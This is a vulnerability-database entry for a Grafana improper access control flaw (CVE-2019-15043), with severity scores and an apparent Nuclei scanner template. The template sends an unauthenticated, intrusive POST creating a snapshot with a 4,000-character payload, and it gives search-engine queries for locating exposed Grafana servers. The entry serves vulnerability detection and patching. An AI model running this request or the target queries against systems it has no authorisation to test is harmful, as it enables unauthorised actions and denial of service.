Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-15043
HistoryJul 04, 2020 - 1:05 p.m.

Grafana - Improper Access Control

2020-07-0413:05:56
ProjectDiscovery
github.com
7

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.4 High

AI Score

Confidence

High

0.281 Low

EPSS

Percentile

96.9%

Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.
id: CVE-2019-15043

info:
  name: Grafana - Improper Access Control
  author: Joshua Rogers
  severity: high
  description: |
    Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: Upgrade to 6.3.4 or higher.
  reference:
    - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
    - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
    - https://bugzilla.redhat.com/show_bug.cgi?id=1746945
    - https://aaron-hoffmann.com/posts/cve-2019-15043/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15043
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2019-15043
    cwe-id: CWE-306
    epss-score: 0.28071
    epss-percentile: 0.96836
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve,cve2019,grafana,dos,intrusive
variables:
  payload: '{{repeat("A", 4000)}}'

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/snapshots"

    body: '{"dashboard": {"name":"{{payload}}"}}'

    headers:
      Content-Type: "application/json"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"deleteUrl":'
          - '"deleteKey":'
          - '"key":'
          - '"url":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100817ecde20d9a1e4f370fe64af96c8819fff7466563ede82546a22586faaf71770221008c38eecd5b26dbe752f9c46e370115b4a0379641320e31ce0e7e019083e576d3:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.4 High

AI Score

Confidence

High

0.281 Low

EPSS

Percentile

96.9%